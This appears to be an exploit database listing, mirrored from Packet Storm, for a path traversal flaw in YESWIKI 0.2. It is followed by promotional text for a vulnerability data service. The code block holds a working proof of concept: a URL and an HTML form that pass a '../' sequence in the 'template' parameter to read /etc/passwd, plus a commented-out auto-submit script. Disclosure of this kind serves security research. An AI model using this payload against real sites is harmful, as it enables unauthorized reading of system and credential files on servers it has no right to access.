Lucene search
K

YESWIKI 0.2 Path Traversal

🗓️ 11 Nov 2015 00:00:00Reported by HaHwulType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

YESWIKI 0.2 Path Traversal exploit on yeswiki 0.

Code
`# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)  
# Date: 2015-11-10  
# Exploit Author: HaHwul  
# Exploit Author Blog: http://www.codeblack.net  
# Vendor Homepage: http://yeswiki.net  
# Software Link: https://github.com/YesWiki/yeswiki  
# Version: yeswiki 0.2  
# Tested on: Debian [Wheezy] , Ubuntu  
# CVE : none  
# ===========================================  
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd  
--><br>  
# Exploit Code<br>  
# ===========================================  
<br><br>  
  
<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">  
<input type="hidden" name="wiki" value="HomePage/diaporama">  
Target: Edit HTML Code<br>  
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>  
  
<input type="submit" value="Exploit">  
</form>  
<!-- Auto Sumbit  
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>  
-->  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation